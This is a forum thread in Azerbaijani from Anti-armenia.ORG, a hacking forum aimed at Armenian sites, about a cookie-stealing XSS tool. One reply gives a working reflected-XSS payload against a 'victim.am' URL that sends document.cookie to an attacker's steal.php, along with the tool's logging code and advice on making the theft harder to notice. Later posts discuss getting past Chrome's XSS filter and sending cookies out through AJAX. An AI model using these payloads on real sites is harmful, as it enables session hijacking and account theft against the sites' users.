Anti-armenia.ORG - Forumlar - XSS Bumper [GOLD]



Istifadəçi
    2016-09-25 20:03 GMT                 

B/F End Developer



Gold
Mesaj Sayı : 8
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Bəzi probremlərə görə silinib.

Anti-armenia.ORG
    

Istifadəçi
    2016-09-25 22:12 GMT                 

SoldieR



VIP
Mesaj Sayı : 84
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət :
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


əllərin dərd görməsin ilk mövzünda ilk repi mən verim

En mutlu gunlerimizi en kotu kabuslara cevirenleri en tatli ruyalarindan uyandiracagiz
Anti-armenia.ORG
    

Istifadəçi
    2016-09-26 05:09 GMT                 

B/F End Developer



Gold
Mesaj Sayı : 8
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər

Anti-armenia.ORG
    

Istifadəçi
    2016-09-26 07:05 GMT                 

PuN!Sh3r



Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


Əziyyət çəkmisən təqdirə layiqdir. Ancaq bəzi çatışmazlıqlar var. Məsələyə texniki və məntiqi tərəfdən yanaşacam. Məntiqi tərəfdə olan problemə görə ümumiyyətlə bu skript yararsızdı. Deməli əgər sən victim.am/page.php?id=1"><script>location.href='http://sizinhost/xss/xss.php';</script> yazaraq hədəfi Javascript hesabına yönləndirsən(cookie ni 1ci fazada götürməsən) və sonra steal.php də loglamağa cəhd etsən ancaq http://sizinhost üçün verilən cookie ni loglayacaqsan. Browser dəki Same-origin policy buna icazə verməyəcək. Düzgün variant 1ci fazada COOKİE oğurlamaqdı.Məsələn belə:
1. XSS bu tərz eksplotasiya olunmalıdı:
Kod:
victim.am/page.php?id=1"><script>document.write("<img src='http://sizinhost/steal.php?data="+document.cookie+"' />")</script>

2. steal.php də bu tərz kod olmalıdı:
Kod:
<?php
if(isset($_GET['data'])){
//Sanitaziya, validasiya ve type-casting olunmus $_GET['data'] menimsedilir $data-ya
//$data DB ye insert olunur
}
?>


Sənin yazdığın kodun niyə işləmədiyini başa düşmək istəsən SOP (same-origin policy) haqda oxu. Mən yazan ssenari transparent yoldur. Hədəfi yönləndirmirsən. Daha transparent yol istəsən AJAX ilə dataları POST edə bilərsən ama bu halda CORS (cross origin resource sharing) aktiv eləməlisən. Bu halda victim-in ruhu da inciməyəcək.
Texniki tərəfdə olan problemlər isə yazdığın kod vulnerable dı yəni sən camaatı pwn eləmək istəyəndə elə səni pwn edəcəklər.
1. SQL Injection və XSS
steal.php də olan boşluqlar hesabına həm səni pwn edəcəklər həm də sənin pwn elədiklərini pwn edəcəklər DB yə insert olunan data XSS ə qarşı sanitaziya və validasiya olunmadığından vics.php girəndə pwn olacaqsan.

Kod:
<?php
include "conf.php";
echo '<form method ="GET">';
$cookie =         $_GET['cookie'];
$ip         =     $_SERVER['REMOTE_ADDR'];
$browser    =     $_SERVER['HTTP_USER_AGENT'];
$port =           $_SERVER['REMOTE_PORT'];
$querysteal = mysql_query("INSERT INTO victim VALUES ('','$ip','$cookie','$browser','$port')");
?>


Burda $cookie, $browser boşluğu saxlayan dəyişənlərdir. Sanitaziya və validasiya mütləqdir.

2. Information disclosure
md5.php də olan $_POST['a'] vulnerable parametrdir. Əgər ora məsələn array gondərsən info disc çıxacaq. Type casting mütləqdir. Bu problem login.php də olan $uname,$upass parametr lərində də var.

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG
    

Istifadəçi
    2016-09-26 07:07 GMT                 

ACOSTА



Informatix
Mesaj Sayı : 111
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Çox sağ ol hazırlayıb bizi ilə bölüşdüyün üçün. Host var test edərəm yaxşı tool'a oxşayır . Desti xətt tanış gəldi ))

Anti-armenia.ORG
    

Istifadəçi
    2016-10-01 13:26 GMT                 

B/F End Developer



Gold
Mesaj Sayı : 8
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


@Punisher.
Baxdım. Düz deyirsən. Fikrimdən çıxıbki, hedef bizim hosta gelende, öz cookiesinden əsər əlamət qalmır.
Toolda deyişiklikler edib açacam môvzunu
Rəy üçün təşəkkürlər.

Anti-armenia.ORG
    

Istifadəçi
    2016-10-04 12:22 GMT                 

Apokalipse



Gold
Mesaj Sayı : 150
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   10  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : baki
Ölkə :
Məslək :
Yaş : 30
Mesaj :

Mövzunu Paylaş!


Sitat
#55851 PuN!Sh3r :


Bro xss-i keçən dəfə yoxladım chromede anti xss filteri var yəni hədəf chrome ilə girsə cookie-ler gəlmiyəcək.Bypass-liq method var?
yoxsa xss-in bir menasi qalmır

Anti-armenia.ORG
    

Istifadəçi
    2016-10-04 16:31 GMT                 

PuN!Sh3r



Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#55890 Apokalipse :
Sitat
#55851 PuN!Sh3r :


Bro xss-i keçən dəfə yoxladım chromede anti xss filteri var yəni hədəf chrome ilə girsə cookie-ler gəlmiyəcək.Bypass-liq method var?
yoxsa xss-in bir menasi qalmır



Çox təəssüf ki Reflected XSS lərdə bu problem var. Chrome daxilində olan Anti-XSS filter request də əgər Javascript məzmunlu datanın olduğunu görsə və bu data reflect olunsa o zaman işə düşür və JS bloklayır, tarixən bir çox variantlar Chrome-un anti-xss ni bypasslayıb (Standart RegEx rule-lar olduğundan). Ancaq son update lər üçün hələki bypass yoxdur. + Əgər stored XSS olsa artıq Chrome da bir kömək edə bilməyəcək XSS i zəif boşluq kimi saymayın plz

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG
    

Istifadəçi
    2016-10-04 20:50 GMT                 

Apokalipse



Gold
Mesaj Sayı : 150
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   10  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : baki
Ölkə :
Məslək :
Yaş : 30
Mesaj :

Mövzunu Paylaş!


Sitat
#55892 PuN!Sh3r :
Sitat
#55890 Apokalipse :
Sitat
#55851 PuN!Sh3r :


Bro xss-i keçən dəfə yoxladım chromede anti xss filteri var yəni hədəf chrome ilə girsə cookie-ler gəlmiyəcək.Bypass-liq method var?
yoxsa xss-in bir menasi qalmır



Çox təəssüf ki Reflected XSS lərdə bu problem var. Chrome daxilində olan Anti-XSS filter request də əgər Javascript məzmunlu datanın olduğunu görsə və bu data reflect olunsa o zaman işə düşür və JS bloklayır, tarixən bir çox variantlar Chrome-un anti-xss ni bypasslayıb (Standart RegEx rule-lar olduğundan). Ancaq son update lər üçün hələki bypass yoxdur. + Əgər stored XSS olsa artıq Chrome da bir kömək edə bilməyəcək XSS i zəif boşluq kimi saymayın plz



Axrıncı yoxlamamda anti xss filteridə qalmışdım dəyə xss-i çoxda ciddiyə almırdim.Birazda araşdırdım document.URL , document.cookie də olan dəyərləri ajax metoduyla göndərsək ciddiyə alinası temalar var.cavab üçün öprəm

Anti-armenia.ORG